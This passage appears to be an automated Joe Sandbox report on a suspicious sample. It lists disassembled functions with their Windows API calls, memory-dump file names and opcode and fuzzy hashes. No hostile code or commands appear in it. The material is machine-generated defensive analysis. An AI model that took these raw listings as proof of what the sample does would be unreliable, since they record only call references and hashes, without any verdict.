FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,004528D3,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E75B

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: FormatMessage
String ID:
API String ID: 1306739567-0
Opcode ID: f2e57c13329fa82bb562111542c19212575287ec657190e48755ffcde1de8f0a
Instruction ID: 307a162b73ad64172b1e6f06154ade3ab8019b251ee6aa90c4987cddc8a641e5
Opcode Fuzzy Hash: f2e57c13329fa82bb562111542c19212575287ec657190e48755ffcde1de8f0a
Instruction Fuzzy Hash: 80E0206178431165F23529156C83F7B120E83C0B08F9480267B50DD3D3DAAE9D09425E

Function 00406300 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

CreateWindowExA.USER32(00000000,0042368C,00000000,94CA0000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00406329

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
Instruction ID: 1d12608fc0467a25e6c73015cc4d191371d7057fe5102c86e19c90aa3d4ae925
Opcode Fuzzy Hash: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
Instruction Fuzzy Hash: 4CE002B2204309BFDB00DE8ADDC1DABB7ACFB4C654F844105BB1C972428275AD608BB1

Function 0042DD0C Relevance: 1.5, APIs: 1, Instructions: 26registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DD38

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 5e59f431e7dc3fbfe634ec8590c1537f060de66ed7aab2066b747fc67b6210b1
Instruction ID: f0f4a7cc191af20e9b9700f54d410718858f5ac06abb37c2f1ccc41e28cff8f4
Opcode Fuzzy Hash: 5e59f431e7dc3fbfe634ec8590c1537f060de66ed7aab2066b747fc67b6210b1
Instruction Fuzzy Hash: 05E07EB2610129AF9B40DE8CDC81EEB37ADEB1D350F408016FA08D7200C274EC519BB4

Function 00454114 Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

FindClose.KERNEL32(00000000,000000FF,0046F950,00000000,0047073F,?,00000000,00470788,?,00000000,004708C1,?,00000000,?,00000000), ref: 0045412A

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: e19e0392ffb8f942ef07e4f90012c062304df668bc5034957742c687a3574691
Instruction ID: 5eabd71f03f270c9e36328c123aabe4f760eecb17ac4c97f42f59bce307939db
Opcode Fuzzy Hash: e19e0392ffb8f942ef07e4f90012c062304df668bc5034957742c687a3574691
Instruction Fuzzy Hash: CEE065B0A04A004BCB14DF3A898425676D25FD5324F04C56AAC58CF3D6E63C84859A26

Function 0041468C Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(00493E46,?,00493E68,?,?,00000000,00493E46,?,?), ref: 004146AB

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
Instruction ID: 3a83c41fa5c3d176b15f2666d2672a78f9af76d4247255e2ff0bda4df6ea0631
Opcode Fuzzy Hash: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
Instruction Fuzzy Hash: 59E012723001199F8250CE5EDC88C57FBEDEBC966130983A6F508C7306DA31EC44C7A0

Function 00406F18 Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00406F2C

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 6989787615dda6fb0474b9a852aed77f7455facdbde297e08749939c69554e6e
Instruction ID: 1f586823f232578dbf745533d190da316c23ef772c10fc749b20f2ce5ea51255
Opcode Fuzzy Hash: 6989787615dda6fb0474b9a852aed77f7455facdbde297e08749939c69554e6e
Instruction Fuzzy Hash: E0D05B723091117AD620955F6C44DA76BDCCBC5770F11063EB558D72C1D7309C01C675

Function 0042365C Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00423608: SystemParametersInfoA.USER32(00000048,00000000,00000000,00000000), ref: 0042361D

ShowWindow.USER32(00410660,00000009,?,00000000,0041EDB4,0042394A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00423677

Part of subcall function 00423638: SystemParametersInfoA.USER32(00000049,00000000,00000000,00000000), ref: 00423654

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: InfoParametersSystem$ShowWindow
String ID:
API String ID: 3202724764-0
Opcode ID: 1489a060ee1bcc8cc48c15b27d983b014cc6d9756e6ca662c79b076239964338
Instruction ID: 40ba6511a88705317f68f90b714cf273492cbff5df7e869aa0dea3a735aecdb5
Opcode Fuzzy Hash: 1489a060ee1bcc8cc48c15b27d983b014cc6d9756e6ca662c79b076239964338
Instruction Fuzzy Hash: 89D05E123831B03106307BB72805ACB86AC8D966AB389047BB5409B302E91E8A0A61AC

Function 004242D4 Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

SetWindowTextA.USER32(?,00000000), ref: 004242EC

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: TextWindow
String ID:
API String ID: 530164218-0
Opcode ID: ec54067a7769377eb2baeee9a4c2879ed8266950ae1d3b96fccc382486b1e86e
Instruction ID: 772c2b490b6417829154bcce5d0a54014a2db275ddfc333997dbbca6f26d49c5
Opcode Fuzzy Hash: ec54067a7769377eb2baeee9a4c2879ed8266950ae1d3b96fccc382486b1e86e
Instruction Fuzzy Hash: 7ED05EE27011702BCB01BAED54C4AC667CC9B8825AB1940BBF904EF257C678CE4083A8

Function 00466254 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00466F40,00000000,00000000,00000000,0000000C,00000000), ref: 0046626C

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
Instruction ID: a3a9c25b9c80179eca176ae0059a0aa24e3542550d9dc9bac8dced773014ab2a
Opcode Fuzzy Hash: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
Instruction Fuzzy Hash: 0ED09272210A109F8364CAADC9C4C97B3ECEF4C2213004659E54AC3B15D664FC018BA0

Function 0042CCF0 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,00000000,00450C2B,00000000), ref: 0042CCFB

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 01dbdc36424fec664e934353753d4045270514496262de1bfab72665a96f96e3
Instruction ID: cee2652a42bb6fa335edebfce0b7cce520d77b1cbd3538a4821e8cc024acaa82
Opcode Fuzzy Hash: 01dbdc36424fec664e934353753d4045270514496262de1bfab72665a96f96e3
Instruction Fuzzy Hash: 66C08CE03222001A9A1065BD3CC911F06C8892833A3A41F37B438E32D2E23E88266028

Function 00406EC8 Relevance: 1.5, APIs: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,0040A8D4,0040CE80,?,00000000,?), ref: 00406EE5

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 7f8aa10a2b0ebcd99225cbdae7d816ffd0c8159e943a954a1b877cbd8b688861
Instruction ID: fbce42704b7dd2fd8be74a622cf743b4adaa06f64be9adac3ea2875d17ee2119
Opcode Fuzzy Hash: 7f8aa10a2b0ebcd99225cbdae7d816ffd0c8159e943a954a1b877cbd8b688861
Instruction Fuzzy Hash: EAC048A13C130032F92035A60C87F16008C5754F0AE60C43AB740BF1C2D8E9A818022C

Function 004072B0 Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

SetCurrentDirectoryA.KERNEL32(00000000,?,0049627E,00000000,00496451,?,?,00000005,00000000,00496485,?,?,00000000), ref: 004072BB

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: b7f7ac57d488892482cd1d27060886e150623f3d0701accf4d1aa85b87094221
Instruction ID: c18bf430a4858a09d5fd0626d157798880aaaa8ea81a5298b6cf69089c3012d4
Opcode Fuzzy Hash: b7f7ac57d488892482cd1d27060886e150623f3d0701accf4d1aa85b87094221
Instruction Fuzzy Hash: B0B012E03D161B27CA0079FE4CC191A01CC46292163501B3A3006E71C3D83CC8080514

Function 0044FF8C Relevance: 1.5, APIs: 1, Instructions: 11fileCOMMON

Download Yara Rule

APIs

SetEndOfFile.KERNEL32(?,?,0045BA62,00000000,0045BBED,?,00000000,00000002,00000002), ref: 0044FF93

Part of subcall function 0044FD14: GetLastError.KERNEL32(0044FB30,0044FDD6,?,00000000,?,004962F0,00000001,00000000,00000002,00000000,00496451,?,?,00000005,00000000,00496485), ref: 0044FD17

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: ErrorFileLast
String ID:
API String ID: 734332943-0
Opcode ID: 40f744221a1c0ad34bc3dfd7c8217ba7111344780b163017895d6acbe08c1ff7
Instruction ID: f3a0f6ff35c414572697f21b60dc386cc542920b113ac52c9a1142ed5c58418d
Opcode Fuzzy Hash: 40f744221a1c0ad34bc3dfd7c8217ba7111344780b163017895d6acbe08c1ff7
Instruction Fuzzy Hash: 54C04CA1B0010147DF00AAAED5C1A0763D85E4E2093144076B504CF206D6A9D8084A24

Function 0042E317 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(?,0042E335), ref: 0042E328

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 15eed7d30ca8f87603f8d2fb4c6016cac4064a0446a0c9a22a0947d8b3773134
Instruction ID: 885b9387dc4d85ef1a6bcc41b3ac28186c42b97ac018e1411ad6f8b1d6607996
Opcode Fuzzy Hash: 15eed7d30ca8f87603f8d2fb4c6016cac4064a0446a0c9a22a0947d8b3773134
Instruction Fuzzy Hash: CFB09B7770C6006DB705DA95B45192D63E4D7C47203E14577F400D3580D93C58014918

Function 004165FC Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

73EA5CF0.USER32(?), ref: 00416603

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e610db4be5d09209adc61dd78440b7b0e9dd7066f593708e54d36c975471eb1e
Instruction ID: 444a78761fbc6a727879d8c4239369b0bde5fc0390465f01f64749401816922a
Opcode Fuzzy Hash: e610db4be5d09209adc61dd78440b7b0e9dd7066f593708e54d36c975471eb1e
Instruction Fuzzy Hash: CDA002756015049ADE04A7A5C849F662298BB44204FC915F971449B092C53C99008E58

Function 00447F7C Relevance: 1.4, APIs: 1, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6c06974965794d864392915e7a6b680c3d3b0c6831c6a02358c4469e8de6b1c
Instruction ID: 72cb28a769613da0e12d57a8c8ff31d21ec4f608c404a89b028e4eccd5103e64
Opcode Fuzzy Hash: c6c06974965794d864392915e7a6b680c3d3b0c6831c6a02358c4469e8de6b1c
Instruction Fuzzy Hash: 87518570E041459FEB01EFA9C482AAEBBF5EB49304F51817BE500E7351DB389D46CB98

Function 0041F3D4 Relevance: 1.3, APIs: 1, Instructions: 52memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDB4,?,0042389F,00423C1C,0041EDB4), ref: 0041F3F2

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 25741e919397043df0620f3a34db4bcef4e36b6359be59aa132e91d838a2cc50
Instruction ID: b55a7b9a32de56e4c0cdb05f5aaeda5055a0700d8eb896d56cc2d0e0b2117302
Opcode Fuzzy Hash: 25741e919397043df0620f3a34db4bcef4e36b6359be59aa132e91d838a2cc50
Instruction Fuzzy Hash: F01148742007069BC710DF19C880B86FBE4EB98390B14C53BE9988B385D374E8598BA9

Function 00452624 Relevance: 1.3, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,0045268D), ref: 0045266F

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 6f78eaee849ee638804850479d3cdbdf5400ab5c1e67a59323e7cfb7155a44e8
Instruction ID: 0a85f8cb76b48f87276e85e1927624e59cb24adfaf40460ac6081df001af0a23
Opcode Fuzzy Hash: 6f78eaee849ee638804850479d3cdbdf5400ab5c1e67a59323e7cfb7155a44e8
Instruction Fuzzy Hash: BD0170356046446F8B10DF699C404EEF7F8DB4A3207208277FC64D3352DB745D099664

Function 0040170C Relevance: 1.3, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,?,00004000,?,?,?,00000000,00004003,00401973), ref: 00401766

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 827a1b883538dfed4e56bd6d9186317dde9c02c408e4bc47c040c509ac29fb8c
Instruction ID: 2f1b12c935ae24389c3dd8db424781fbbcf1746defe36878ea7ad6421184be39
Opcode Fuzzy Hash: 827a1b883538dfed4e56bd6d9186317dde9c02c408e4bc47c040c509ac29fb8c
Instruction Fuzzy Hash: 0C0170766043108FC3109F29DCC4E2677E8D780378F05413EDA84673A0D37A6C0187D9

Function 00406F50 Relevance: 1.3, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00406F51

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 8a7e85c26bba006a24699feaad57dd478220a7a6e3331b9edb59fbcda9639b9f
Instruction ID: 073c3129693101c5e7833b7ffa09eca8aa7a1e81ff9bb2ce6bcaaab03392c7d4
Opcode Fuzzy Hash: 8a7e85c26bba006a24699feaad57dd478220a7a6e3331b9edb59fbcda9639b9f
Instruction Fuzzy Hash:

Non-executed Functions

Function 0044AEAC Relevance: 166.5, APIs: 48, Strings: 47, Instructions: 252libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 0044AE58: GetVersionExA.KERNEL32(00000094), ref: 0044AE75

LoadLibraryA.KERNEL32(uxtheme.dll,?,0044EFC9,004970B6), ref: 0044AED3
GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044AEEB
GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044AEFD
GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044AF0F
GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044AF21
